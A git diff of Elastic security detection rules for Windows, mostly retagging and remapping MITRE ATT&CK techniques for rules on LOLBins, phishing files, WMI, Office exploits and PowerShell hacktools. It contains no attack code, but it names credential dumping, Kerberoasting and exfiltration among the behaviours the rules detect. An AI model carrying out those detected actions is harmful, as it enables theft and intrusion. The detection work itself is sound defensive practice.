a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml index c728a7ba058..a09a3c65442 100644 --- a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml +++ b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,41 +103,21 @@ sequence by process.parent.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" [[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1216" -name = "System Script Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1216/" +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.003" -name = "CMSTP" -reference = "https://attack.mitre.org/techniques/T1218/003/" [[rule.threat.technique.subtechnique]] id = "T1218.004" @@ -164,7 +144,6 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" @@ -174,15 +153,36 @@ reference = "https://attack.mitre.org/techniques/T1220/" id = "T1497" name = "Virtualization/Sandbox Evasion" reference = "https://attack.mitre.org/techniques/T1497/" + [[rule.threat.technique.subtechnique]] id = "T1497.003" name = "Time Based Checks" reference = "https://attack.mitre.org/techniques/T1497/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_downloaded_shortcut_files.toml b/rules/windows/execution_downloaded_shortcut_files.toml index d4347a8e04b..9adeb9ceb50 100644 --- a/rules/windows/execution_downloaded_shortcut_files.toml +++ b/rules/windows/execution_downloaded_shortcut_files.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -18,14 +18,7 @@ name = "Downloaded Shortcut Files" risk_score = 47 rule_id = "39157d52-4035-44a8-9d1a-6f8c5f580a07" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -70,41 +63,18 @@ Shortcut files (.lnk) are used in Windows environments to link to executable fil [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_downloaded_url_file.toml b/rules/windows/execution_downloaded_url_file.toml index 1e01769894a..c14b3d977e2 100644 --- a/rules/windows/execution_downloaded_url_file.toml +++ b/rules/windows/execution_downloaded_url_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/06/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -18,14 +18,7 @@ name = "Downloaded URL Files" risk_score = 47 rule_id = "cd82e3d6-1346-4afd-8f22-38388bbf34cb" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -72,36 +65,13 @@ URL shortcut files, typically used for quick access to web resources, can be exp [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_enumeration_via_wmiprvse.toml b/rules/windows/execution_enumeration_via_wmiprvse.toml index 15f89225424..cbb812845f3 100644 --- a/rules/windows/execution_enumeration_via_wmiprvse.toml +++ b/rules/windows/execution_enumeration_via_wmiprvse.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,20 +63,7 @@ Windows Management Instrumentation (WMI) is a powerful framework for managing da risk_score = 21 rule_id = "770e0c4d-b998-41e5-a62e-c7901fd7f470" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -99,51 +86,51 @@ process where host.os.type == "windows" and event.type == "start" and process.co [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" -[[rule.threat.technique.subtechnique]] -id = "T1016.001" -name = "Internet Connection Discovery" -reference = "https://attack.mitre.org/techniques/T1016/001/" - [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" -[[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_from_unusual_path_cmdline.toml b/rules/windows/execution_from_unusual_path_cmdline.toml index 2b11f8ec924..82a8d3aa8d2 100644 --- a/rules/windows/execution_from_unusual_path_cmdline.toml +++ b/rules/windows/execution_from_unusual_path_cmdline.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -236,36 +236,66 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml index 62b894c0d72..2a1c60b804f 100644 --- a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -113,16 +113,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 21 rule_id = "b29ee2be-bf99-446c-ab1a-2dc0183394b8" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"] type = "eql" query = ''' @@ -140,36 +131,36 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_initial_access_foxmail_exploit.toml b/rules/windows/execution_initial_access_foxmail_exploit.toml index 1724e0f677c..9b47d891bbf 100644 --- a/rules/windows/execution_initial_access_foxmail_exploit.toml +++ b/rules/windows/execution_initial_access_foxmail_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/29" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,26 +90,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1189" -name = "Drive-by Compromise" -reference = "https://attack.mitre.org/techniques/T1189/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_initial_access_via_msc_file.toml b/rules/windows/execution_initial_access_via_msc_file.toml index b0fc6db6048..580c7458cb8 100644 --- a/rules/windows/execution_initial_access_via_msc_file.toml +++ b/rules/windows/execution_initial_access_via_msc_file.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,19 +50,7 @@ references = ["https://www.genians.co.kr/blog/threat_intelligence/facebook"] risk_score = 73 rule_id = "e760c72b-bb1f-44f0-9f0d-37d51744ee75" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Initial Access", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" @@ -100,41 +88,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.014" +name = "MMC" +reference = "https://attack.mitre.org/techniques/T1218/014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_initial_access_wps_dll_exploit.toml b/rules/windows/execution_initial_access_wps_dll_exploit.toml index b6d8c918d59..d318934d34c 100644 --- a/rules/windows/execution_initial_access_wps_dll_exploit.toml +++ b/rules/windows/execution_initial_access_wps_dll_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,16 +57,7 @@ references = [ risk_score = 73 rule_id = "ac6bc744-e82b-41ad-b58d-90654fa4ebfb" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -88,26 +79,18 @@ any where host.os.type == "windows" and process.name : "promecefpluginhost.exe" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1189" -name = "Drive-by Compromise" -reference = "https://attack.mitre.org/techniques/T1189/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_mofcomp.toml b/rules/windows/execution_mofcomp.toml index a20ec6e9ab6..1b244d6b497 100644 --- a/rules/windows/execution_mofcomp.toml +++ b/rules/windows/execution_mofcomp.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/02/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -25,18 +25,7 @@ name = "Mofcomp Activity" risk_score = 21 rule_id = "210d4430-b371-470e-b879-80b7182aa75e" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Elastic Endgame", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -90,31 +79,31 @@ Mofcomp.exe is a tool used to compile Managed Object Format (MOF) files, which d [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/execution_ms_office_written_file.toml b/rules/windows/execution_ms_office_written_file.toml index 979a2d927a3..6f016f0f871 100644 --- a/rules/windows/execution_ms_office_written_file.toml +++ b/rules/windows/execution_ms_office_written_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint"] maturity = "production" -updated_date = "2024/08/06" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -99,30 +99,22 @@ sequence with maxspan=2h [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_posh_hacktool_functions.toml b/rules/windows/execution_posh_hacktool_functions.toml index 8e6c5f0f7eb..25521e39cf8 100644 --- a/rules/windows/execution_posh_hacktool_functions.toml +++ b/rules/windows/execution_posh_hacktool_functions.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,14 +102,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Tactic: Discovery", "Tactic: Execution", "Tactic: Exfiltration", "Tactic: Lateral Movement", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -310,22 +303,111 @@ case_insensitive = true value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique]] +id = "T1558" +name = "Steal or Forge Kerberos Tickets" +reference = "https://attack.mitre.org/techniques/T1558/" + +[[rule.threat.technique.subtechnique]] +id = "T1558.003" +name = "Kerberoasting" +reference = "https://attack.mitre.org/techniques/T1558/003/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_posh_portable_executable.toml b/rules/windows/execution_posh_portable_executable.toml index 2053274cec8..a2bbc3e2a74 100644 --- a/rules/windows/execution_posh_portable_executable.toml +++ b/rules/windows/execution_posh_portable_executable.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -118,34 +118,34 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = 